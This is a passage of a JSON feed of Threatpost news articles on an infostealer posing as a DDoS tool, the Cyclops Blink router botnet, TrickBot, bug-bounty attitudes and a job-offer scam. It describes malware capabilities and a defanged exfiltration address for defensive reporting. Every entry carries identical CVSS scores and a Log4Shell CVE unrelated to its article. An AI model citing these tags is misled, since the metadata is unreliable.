out, there\u2019s a typo in the group\u2019s name, which is rendered as \u201cdisBalancher.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10135135/Disbalancer-Liberator-e1646938312137.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10135135/Disbalancer-Liberator-e1646938312137.png>)\n\nScreenshot from Disbalancer Liberator website. Source: Cisco Talos.\n\ndisBalancer\u2019s tool \u2013 Disbalancer.exe \u2013 is sincerely meant to DDoS Russia. The infostealer campaign, on the other hand, is based on a dropper disguised as that tool. It\u2019s protected with ASProtect, Cisco said, a known packer for Windows executables.\n\n\u201cIf a researcher tries to debug the malware execution, it will be confronted with a general error. The malware, after performing the anti-debug checks, will launch Regsvcs.exe, which is included along with the .NET framework,\u201d according to the writeup. \u201cIn this case, the regsvcs.exe is not used as a living off the land binary (LoLBin). It is injected with the malicious code, which consists of the Phoenix information stealer.\u201d\n\nThe actors behind this campaign aren\u2019t the newbies flocking to the front lines. Rather, evidence shows that they\u2019ve been distributing infostealers since at least November, Cisco said, as evidenced by the fact that the infostealer exfiltrates stolen info to a remote IP address \u2013 in this case, a Russian IP \u2014 95[.]142.46.35 \u2014 on port 6666.\n\nThat IP/port pair \u201chas been distributing infostealers since at least November 2021,\u201d researchers said. The longevity of the pairing enforces researchers\u2019 belief that these are experienced actors at work, taking advantage of the Ukraine calamity, rather than threat actors new to the scene.\n\nThe infostealer is hoovering up a broad array of information, Cisco said. \u201cThe .ZIP file provided in the Telegram channel contains an executable, which is the infostealer,\u201d according to the report. \u201cThe infostealer gathers information from a variety of sources, including web browsers like Firefox and Chrome and other locations on the filesystem for key pieces of information.\u201d\n\nThe researchers provided a deobfuscated screen capture, replicated below, showing how the pilfered info is sent with a simple base64 encoding. The screen grab shows the breadth of information being pulled off of infected systems, including a large number of crypto wallets and information on MetaMask. \u201cA .ZIP file of the stolen data is also uploaded to the server, completing the compromise,\u201d Cisco said.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10142913/Sample-data-exfiltrated-by-infostealer-e1646940569947.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10142913/Sample-data-exfiltrated-by-infostealer-e1646940569947.png>)\n\nSample data exfiltrated to server. Source: Cisco Talos.\n\n## Don\u2019t Eat That: You Don\u2019t Know Where It\u2019s Been\n\nThe infostealer masquerading as a DDoS tool to attack Russian targets is just one example of the many ways cybercriminals are milking the invasion for social-engineering sustenance, exploiting sympathizers on both sides. \u201cSuch activity could take the form of themed email lures on news topics or donation solicitations, malicious links purporting to host relief funds or refugee support sites, malware masquerading as security defensive or offensive tools, and more,\u201d researchers suggested.\n\nIn this case, cybercriminals were distributing an infostealer in an apparently profit-motivated campaign. It could have been worse, though, according to the report: \u201cIt could have just as easily been a more sophisticated state-sponsored actor or privateer group doing work on behalf of a nation-state.\u201d\n\nExpect this type of situational exploitation to continue and to diversify, Cisco predicted: \u201cThe global interest in the conflict creates a massive potential victim pool for threat actors and also contributes to a growing number of people interested in carrying out their own offensive cyber operations.\u201d\n\nCisco reminded users to essentially avoid eating food that\u2019s been dropped on the floor. You don\u2019t know where that stuff\u2019s been, researchers warned, so be wary of installing software \u201cwhose origins are unknown, especially software that is being dropped into random chat rooms on the internet.\u201d\n\nAs always, carefully inspect suspicious emails before opening attachments, Cisco advised, and validate software or other files before downloading.\n\n031122 0934 UPDATE: Corrected identification of Conti leaker.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T19:54:00", "type": "threatpost", "title": "Malware Posing as Russia DDoS Tool Bites Pro-Ukraine Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T19:54:00", "id": "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "href": "https://threatpost.com/malware-posing-russia-ddos-tool-bites-pro-ukraine-hackers/178864/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T17:24:48", "description": "The modular botnet known as Cyclops Blink, linked to the same advanced persistent threat (APT) behind the [NotPetya wiper attacks](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), is expanding its device targeting to include ASUS routers.\n\nFurther, it\u2019s likely that the botnet\u2019s purpose is far more sinister than the average [Mirai-knockoff\u2019s penchant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) for distributed denial-of-service (DDoS) attacks.\n\nThat\u2019s the word from Trend Micro researchers, who noted that Cyclops Blink casts a wide net in terms of the owners of the devices it chooses to infect, with no specific focus on high-value government or diplomatic entities. While that\u2019s out of step with typical APT behavior, researchers said that it\u2019s likely the botnet will be used as persistent infrastructure for mounting further attacks on high-value targets, and as such, should be indiscriminately distributed for maximum effect.\n\n\u201cIt should be noted that these victims do not appear to be evidently valuable targets for either economic, military or political espionage,\u201d according to the firm\u2019s analysis. \u201cFor example, some of the live command-and-control servers (C2s) are hosted on WatchGuard devices used by a law firm in Europe, a medium-sized company producing medical equipment for dentists in Southern Europe and a plumber in the United States.\u201d\n\nCyclops Blink itself has been around since 2019, initially looking to infect WatchGuard Firebox devices according to a [February analysis (PDF)](<https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf>) performed by the UK\u2019s National Cyber Security Centre (NCSC). Now, to further its goal of widescale infections, ASUS routers are now on the menu, Trend Micro noted, with the latest variant incorporating a fresh module tailored to the vendor\u2019s devices.\n\n\u201cOur research was carried out on the RT-AC68U, but other ASUS routers such as RT-AC56U might be affected as well,\u201d researchers said. \u201cOur investigation shows that there are more than 200 Cyclops Blink victims around the world. Typical countries of infected WatchGuard devices and ASUS routers are the United States, India, Italy, Canada and a long list of other countries, including Russia.\u201d\n\n## **A Sinister Purpose?**\n\nCyclops Blink is the handiwork of the Russian-speaking Sandworm APT (a.k.a. Voodoo Bear or TeleBots), according to Trend Micro \u2013 the same group that\u2019s been [linked to a host of](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) very high-profile state-sponsored attacks, as well as the VPNFilter internet-of-things (IoT) botnet.\n\n\u201cSandworm was also responsible for\u2026the [2015 and 2016 attacks on the Ukrainian electrical grid](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), the 2017 NotPetya attack, the 2017 French presidential campaign, the [2018 Olympic Destroyer attack](<https://threatpost.com/olympic-destroyer-malware-behind-winter-olympics-cyberattack-researchers-say/129918/>) on the Winter Olympic Games and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW),\u201d researchers noted in a [Thursday analysis](<https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html>).\n\nInternet routers have been a favorite target for building out botnets for many years, thanks to \u201cinfrequency of patching, the lack of security software and the limited visibility of defenders\u201d when it comes to these devices, as Trend Micro put it. More often than not, such botnets are used to carry out DDoS attacks; but in Cyclops Blink\u2019s case, the motives are less obvious.\n\n\u201cThe purpose of this botnet is still unclear: Whether it is intended to be used for DDoS attacks, espionage or proxy networks remains to be seen,\u201d researchers said. \u201cBut what is evident is that Cyclops Blink is an advanced piece of malware that focuses on persistence and the ability to survive domain sinkhole attempts and the takedown of its infrastructure.\u201d\n\nIn fact, some of the infected devices that researchers observed have been compromised for more than two and a half years, with some set up as stable C2 servers for other bots.\n\nIt is thus likely, the researchers speculated, that Cyclops Blink is destined for bigger horizons than denial of service.\n\n\u201cThe more routers are compromised, the more sources of powerful data collection \u2014 and avenues for further attacks \u2014 become available to attackers,\u201d according to the analysis, which raised the specter of \u201ceternal botnets.\u201d\n\n\u201cOnce an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying or anything else that the attacker wants to do,\u201d researchers warned. \u201cThe underlying operating systems for the majority of IoT devices is Linux, which is also used by many powerful systems tools. This can allow attackers to add anything else that they might need to complete their attacks.\u201d\n\nGiven Sandworm\u2019s track record, it\u2019s wise to expect the worst, the firm noted.\n\n\u201cSandworm\u2019s previous high-profile victims and their attacks\u2019 substantial impact on these organizations are particularly worrying \u2014 even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best,\u201d researchers said.\n\n## **A Few Technical Specifics on a New Botnet Variant**\n\nCoded in the C language, Cyclops Blink relies on hard-coded TCP ports to communicate with a range of command-and-control servers (C2s), according to the analysis. For each port, it creates a rule in the Netfilter Linux kernel firewall to allow output communication to it.\n\nOnce it\u2019s made contact, the malware initializes an OpenSSL library, and its core component then cranks up operations for a series of hard-coded modules.\n\n\u201cCommunication with the modules is performed via pipes,\u201d according to Trend Micro. \u201cFor each hard-coded module, the malware creates two pipes before executing them in their own child processes.\u201d\n\nThe malware then pushes various parameters to the modules, which in turn respond with data that the core component encrypts with OpenSSL functions before sending it to the C2 server.\n\n\u201cThe data is encrypted using AES-256 in cipher block chaining (CBC) mode with a randomly generated 256-bit key and 128-bit initialization vector (IV). It is then encrypted using a hard-coded RSA-2560 (320-bit) public key unique to each sample,\u201d according to the analysis. \u201cThe C2 server must have the corresponding RSA private key to decrypt the data.\u201d\n\nResearchers added, \u201cTo send data to the C2 server, the core component performs a TLS handshake with a randomly chosen C2 server at a random TCP port, both of which are from a hard-coded list.\u201d\n\nInitially, the core component sends a list of supported commands to the C2 server and then waits to receive one of the commands back. These can be aimed at the core component itself or to one of its modules, according to the writeup.\n\nIf a command targets the core component, it can be one of the following:\n\n * Terminate the program\n * Bypass the data-sending interval and send data to C2 servers immediately\n * Add a new C2 server to the list in memory\n * Set time to send the next packet to the C2 server\n * Set time to send the next packet to the C2 server\n * Add a new module (an ELF file should be received following the command)\n * Reload the malware\n * Set the local IP address parameter\n * Set a new worker ID\n * Set an unknown byte value\n * Resend configuration to all running modules\n\nAs for the commands meant for the modules, the latest variant studied by Trend Micro now includes \u201cAsus (0x38),\u201d meant to activate a brand-new module built to infect ASUS routers.\n\n**Targeting ASUS Routers**\n\nThe ASUS module is built to access and replace a router\u2019s flash memory, thus enslaving it to the botnet, researchers explained.\n\n\u201cThis module can read and write from the devices\u2019 flash memory,\u201d they said. \u201cThe flash memory is used by these devices to store the operating system, configuration and all files from the file system.\u201d\n\nCyclops Blink reads 80 bytes from the flash memory, writes it to the main pipe, and then waits for a command with the data needed to replace the content.\n\n\u201cAs the flash memory content is permanent, this module can be used to establish persistence and survive factory resets,\u201d researchers explained.\n\nA second module, straightforwardly called \u201csystem reconnaissance (0x08),\u201d is responsible for gathering various data from the infected device and sending it to the C2 server.\n\nSpecifically, it harvests:\n\n * The Linux version of the device\n * Information about the device\u2019s memory consumption\n * The SSD storage information\n * The content of the following files: \n * /etc/passwd\n * /etc/group\n * /proc/mounts\n * /proc/partitions\n * Information about network interfaces\n\nA third module, \u201cfile download (0x0f),\u201d can download files from the internet using DNS over HTTPS (DoH).\n\nTrend Micro noted that ASUS is likely not the only new module that will emerge for the botnet. After all, Sandworm\u2019s previous botnet, VPNFilter, targeted a wide range of router vendors, including ASUS, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL and ZDE.\n\n\u201cWe have evidence that other routers are affected too, but as of reporting, we were not able to collect Cyclops Blink malware samples for routers other than WatchGuard and ASUS,\u201d according to the analysis. \u201cBased on our observation, we strongly believe that there are more targeted devices from other vendors. This malware is modular in nature, and it is likely that each vendor has different modules and architectures that were thought out well by the Cyclops Blink actors.\u201d\n\n## **How to Defend Against Becoming a Botnet Victim**\n\nLike with other botnets, organizations can protect themselves from Cyclops Blink attacks by falling back on basic security hygiene, Trend Micro noted, including the use of strong passwords, using a virtual private network (VPN), regular firmware patching and so on. Most successful compromises are the result of default or weak password use or the exploitation of known vulnerabilities.\n\nIf an organization\u2019s devices have been infected with Cyclops Blink, researchers said that the best course of action is to chuck the victimized router for a new one, given the malware\u2019s prodigious persistence capabilities.\n\n\u201cIt is best to get a new router,\u201d they explained. \u201cPerforming a factory reset might blank out an organization\u2019s configuration, but not the underlying operating system that the attackers have modified. If a particular vendor has firmware updates that can address a Cyclops Blink attack or any other weakness in the system, organizations should apply these as soon as possible. However, in some cases, a device might be an end-of-life product and will no longer receive updates from its vendor. In such cases, an average user would not have the ability to fix a Cyclops Blink infection.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T17:17:17", "type": "threatpost", "title": "Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T17:17:17", "id": "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "href": "https://threatpost.com/sandworm-asus-routers-cyclops-blink-botnet/178986/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T00:10:25", "description": "The group behind the TrickBot malware is back after an unusually long lull between campaigns, according to researchers \u2014 but it\u2019s now operating with diminished activity. They concluded that the pause could be due to the TrickBot gang making a large operational shift to focus on partner malware, such as Emotet.\n\nA [report](<https://intel471.com/blog/trickbot-2022-emotet-bazar-loader>) from Intel 471 published on Thursday flagged a \u201cstrange\u201d period of relative inactivity, where \u201cfrom December 28, 2021 until February 17, 2022, Intel 471 researchers have not seen new TrickBot campaigns.\u201d\n\nBefore the lull, an [incident](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) last November indicated that the TrickBot botnet was used to distribute Emotet \u2013 indicating that the collaboration with the group behind the Emotet malware is ongoing. Intel 471 also tied in a third group \u2013 the operators of the Bazar malware family \u2013 whose controllers were found \u201cpushing commands to download and execute TrickBot (mid-2021) and Emotet (November 2021).\u201d\n\nThe report noted how, in years past, malicious actors have used TrickBot to install Emotet on target machines, and vice versa. Researchers speculated that, this time around, \u201cit\u2019s likely that the TrickBot operators have phased TrickBot malware out of their operations in favor of other platforms, such as Emotet.\u201d\n\n## **TrickBot\u2019s \u2018Turbulent\u2019 Recent History**\n\nTrickBot was originally deployed as a banking trojan, in 2016. In the time since, it\u2019s developed into a full-suite malware ecosystem, replete with tools for [spying and stealing data](<https://threatpost.com/trickbot-malware-virtual-desktop-espionage/167789/>), [port scanning](<https://threatpost.com/trickbot-port-scanning-module/163615/>), [anti-debugging](<https://threatpost.com/trickbot-crash-security-researchers-browsers/178046/>) \u2013 crashing researchers\u2019 browsers before they have a chance to identify its presence \u2013 [identifying and wiping firmware](<https://threatpost.com/trickbot-returns-bootkit-functions/161873/>), and much more.\n\nTrickBot has received particular attention from authorities in recent years. In 2020, Microsoft obtained a U.S. court order that allowed it to [seize](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>) servers from the group behind the malware. Last year, [multiple](<https://threatpost.com/trickbot-coder-decades-prison/166732/>) [members](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>) of that group were arrested and handed charges carrying potentially years-long prison sentences. Despite these efforts, TrickBot remained active.\n\nUntil late last December, that is, when new attacks ground to a halt. According to the report, Trickbot\u2019s most recent campaign \u201ccame on December 28, 2021. That was one of three malware campaigns that were active during the month. As a contrast, eight different [campaigns] were discovered in November 2021.\u201d\n\n\u201cWhile there have been lulls from time-to-time,\u201d the report noted, \u201cthis long of a break can be considered unusual.\u201d\n\nThe decline in activity continues as well: TrickBot\u2019s onboard malware configuration files, which contain a list of controller addresses to which the bot can connect, \u201chave gone untouched for long periods of time,\u201d researchers said.\n\nTellingly, these files \u201cwere once updated frequently, but are receiving fewer and fewer updates,\u201d researchers said. On the other hand, command-and-control (C2) infrastructure associated with TrickBot remains active, with updates adding \u201cadditional plugins, web injects and additional configurations to bots in the botnet.\u201d\n\nThe researchers have now concluded with high confidence that \u201cthis break is partially due to a big shift from TrickBot\u2019s operators, including working with the operators of Emotet.\u201d\n\n## **An Old Alliance**\n\nAs noted, the collaboration with Emotet (and Bazar Loader, for that matter) is not new. But researchers told Threatpost that the nature of the relationship could be evolving.\n\n\u201cIt\u2019s difficult to say what could result from the collaboration,\u201d wrote Hank Schless, senior manager for security solutions at Lookout, via email. \u201cWe do know that Emotet recently began testing how it could install Cobalt Strike beacons on previously infected devices, so maybe they could combine functionality with TrickBot.\u201d Cobalt Strike is a penetration testing tool used by cyber-analysts [and attackers](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) alike.\n\n\u201cIn the security industry, knowledge-sharing is how we discover some of the most nefarious threats,\u201d he noted. \u201cHowever, on the flip side of the coin you have threat actors who are doing the same thing \u2026 they share their malware on Dark Web forums and other platforms in ways that help the entire community advance their tactics.\u201d\n\nSometimes, cybercrime gangs have \u201cpartnerships or business relationships much like those that happen in conventional business,\u201d John Bambenek, principal threat hunter at Netenrich, told Threatpost via email. \u201cIn this case, it looks like the crew behind TrickBot decided it was easier to \u2018buy\u2019 than \u2018build.'\u201d\n\nSome think the malware may be on its way out. After all, TrickBot is now five years old: a lifetime in cybersecurity terms. \u201cPerhaps,\u201d Intel 471 researchers wrote, \u201ca combination of unwanted attention to TrickBot and the availability of newer, improved malware platforms has convinced the operators of TrickBot to abandon it.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_** [**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T21:32:15", "type": "threatpost", "title": "TrickBot Takes a Break, Leaving Researchers Scratching Their Heads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T21:32:15", "id": "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "href": "https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T15:47:11", "description": "Enterprises are putting greater stock in cybersecurity, but outdated \u201csecurity by obscurity\u201d is still prevailing as companies wrestle with security awareness and shy away from bug-bounty programs.\n\nThat\u2019s according to new survey data from HackerOne, which found that a full 65 percent of organizations surveyed claimed that they \u201cwant to be seen as infallible.\u201d However, just as many \u2013 64 percent \u2013 said they practice a culture of security through obscurity, where secrecy is used as the primary method of protecting sensitive systems and assets.\n\n## Struggling with Security Awareness\n\nWhen it comes to what\u2019s actually happening on the ground inside organizations, 57 percent of respondents in the report \u2013 \u201cThe Corporate Security Trap: Shifting Security Culture from Secrecy to Transparency\u201d \u2013 said that they struggle to create a culture of cybersecurity, and only 26 percent are \u201cvery confident\u201d that staff are following security practices.\n\nWorse, only 12 percent of departments outside of security and IT make cyber-awareness and training a core focus, according to the survey.\n\nAnd that\u2019s translating to trouble: About 63 percent said they\u2019ve had a security breach as a result of staff sidestepping security measures.\n\nSome of the issues come from the top: Only 29 percent of boards are \u201cdeeply involved\u201d in cybersecurity strategy; and 65 percent said that the idea that security slows innovation is telegraphed to them.\n\nMeanwhile, 63 percent of organizations said that they believe that cybersecurity is \u201cas important as cost when choosing a supplier,\u201d and 62 percent of organizations \u201cwould take their business elsewhere if a supplier suffered a data breach.\u201d\n\n## The Problem with Secrecy\n\nThus, perhaps it\u2019s no wonder that 38percent of respondents agreed that their organizations \u201caren\u2019t open about their cybersecurity practices.\u201d\n\nBut according to the authors of the report, this kind of approach is harmful, because \u201cby not admitting weaknesses and asking for help fixing them, organizations risk far more significant damage to their brand should a vulnerability be exploited.\u201d\n\n\u201cSunshine is the best medicine,\u201d wrote HackerOne CTO and co-founder Alex Rice, in the report. \u201cShining a light on the work to be done is the only way to win. We must stop asking security teams to toil away in obscurity.\u201d\n\nThe report suggested a few general changes organizations can make, like reporting breaches to stakeholders and publishing reports outlining security measures that companies have in place. Another practical fix to a closed security culture would be putting into place Vulnerability Disclosure Policies (VDPs), bug-bounty programs and regular pentests that get third-party researchers involved.\n\nHowever, third-party vulnerability reporting comes with its own complications.\n\n## The Controversy Around Bug Bounties\n\nMajor corporations like [Google](<https://threatpost.com/google-product-abuse-bug-bounties/158940/>) and [Intel](<https://threatpost.com/intel-expands-bug-bounty-program-post-spectre-and-meltdown/129980/>) pay out thousands of dollars at a time \u2013 even [millions of dollars](<https://threatpost.com/google-record-high-bug-bounty-payouts/152354/>) every year \u2013 in bug-bounty programs. With the financial incentive to do so, outside researchers and friendly hackers help companies find zero-day vulnerabilities early, before the bad guys do.\n\nHowever, this new survey data shows that not everyone is on board, suggesting that not all security professionals are open to outside scrutiny. A full 67 percent of respondents said that they \u201cwould rather accept software vulnerabilities than work with hackers.\u201d\n\nAnd the hesitancy goes both ways. Ethical hackers are often dissuaded from reporting vulnerabilities to vendors, because they\u2019re so often [ignored or outright attacked](<https://threatpost.com/the-vulnerability-disclosure-process-still-broken/137180/>) for doing so. In October, for example, the governor of Missouri launched a [criminal investigation against a journalist](<https://threatpost.com/missouri-prosecute-hacker-data-leak/175501/>) who reported that the state\u2019s website was exposing hundreds of thousands of social security numbers on the web.\n\nIt\u2019s no surprise, then, that 50 percent of hackers \u201chave not disclosed a bug because of a [previous negative experience](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) or lack of channels through which to report,\u201d according to the report.\n\n## What Organizations Can Do\n\nTo establish trust and openness in corporate cybersecurity, HackerOne suggested four core tenets for corporate security responsibility. They are:\n\n * **Encouraging industry-wide transparency to build trust and share intelligence;**\n * **Fostering a culture of industry-wide collaboration that gives everyone the tools to take control of reducing cyber-risk;**\n * **Promoting innovation by inspiring development teams to build with security in mind and bring secure products to market faster;**\n * **And holding oneself and suppliers accountable to following best practices to develop security as an easy point of differentiation.**\n\nThe stakes are high: About 53 percent of survey respondents admitted that \u201cthey have lost customers as a result of a security breach.\u201d Bottom line? The sooner organizations evolve to be more open and collaborative about security, the better off they \u2013 and the rest of us, by extension \u2013 will be.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T15:30:19", "type": "threatpost", "title": "Most Orgs Would Take Security Bugs Over Ethical Hacking Help", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T15:30:19", "id": "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "href": "https://threatpost.com/orgs-security-bugs-ethical-hacking-help/178862/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:22", "description": "Riot Games, the developer behind League of Legends, has filed a California lawsuit against scammers, whose identities aren\u2019t yet known, for ripping off job seekers with the promise of a gig with the company.\n\nUsually early in their careers and eager for a chance with a gaming company like Riot, job hunters are either targeted by a cybercriminal posing as a recruiter or with fake ads on popular employment sites like Indeed, Riot\u2019s filing explained.\n\nThis email submitted as part of Riot\u2019s lawsuit includes a fake listing for a video game artist/illustrator.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10134745/riot-fraud-email-job-opening-.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10134745/riot-fraud-email-job-opening-.png>)\n\nSource:\n\nThen, the applicant is run through an imaginary interview process with questions that seem legit, like, \u201cWhy do you want to work at Riot Games?\u201d and, \u201cHonestly describe what kind of working conditions you thrive in.\u201d\n\nThe interview would often be conducted by chat and followed by a quick job offer.\n\nTo make things extra convincing, the fraudsters used contacts and other communications doctored-up with Riot branding, including convincing looking employment contracts.\n\nAfter the interview, there\u2019s just one step left for the interviewee \u2014 they are asked to send money for \u201cwork equipment\u201d like an iPad, which the interviewer assures the new hire will be refunded. Spoiler: they aren\u2019t going to be.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10135006/riot-text-ask-for-money.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10135006/riot-text-ask-for-money.png>)\n\nSource: Polygon.\n\nRiot included copies of checks sent to the fraudsters by victims in its complaint, ranging from $2,400 to $4,300.\n\nRiot wasn\u2019t the only prominent gaming company used to lure in victims, Polygon reportedly heard from people approached by fake representatives of Rockstar Games and Manticore Games, according to its report.\n\n\u201c[The scam] is absolutely appalling,\u201d Riot\u2019s lawyers wrote in the complaint. \u201cTheir victims largely are young, na\u00efve, and want nothing more than to work for Riot, one of the most prestigious video-game companies in the world. Defendants prey on the hopes and dreams of these individuals in order to steal their identities and pillage their bank accounts.\u201d\n\nRiot Games representatives said in an interview with Polygon that the company isn\u2019t exactly sure how many people have already been [victimized by the phishing campaign](<https://www.polygon.com/22822273/riot-games-job-recruiting-scam-lawsuit>).\n\n## **Gamers and \u2018Dynamite Phishing\u2019 **\n\nPhishing lure themes are fickle, and ebb and flow with the latest headlines. COVID-19, [Chipotle offers](<https://threatpost.com/chipotle-serves-up-lures/168279/>), easy [infrastructure legislation money](<https://threatpost.com/attackers-impersonate-dot-phishing-scam/169484/>), and now, dream gaming jobs, are all bait intended to illicit an emotional reaction and make otherwise rational people take action without thinking it through.\n\nLast summer, the Threat Intelligence Team at 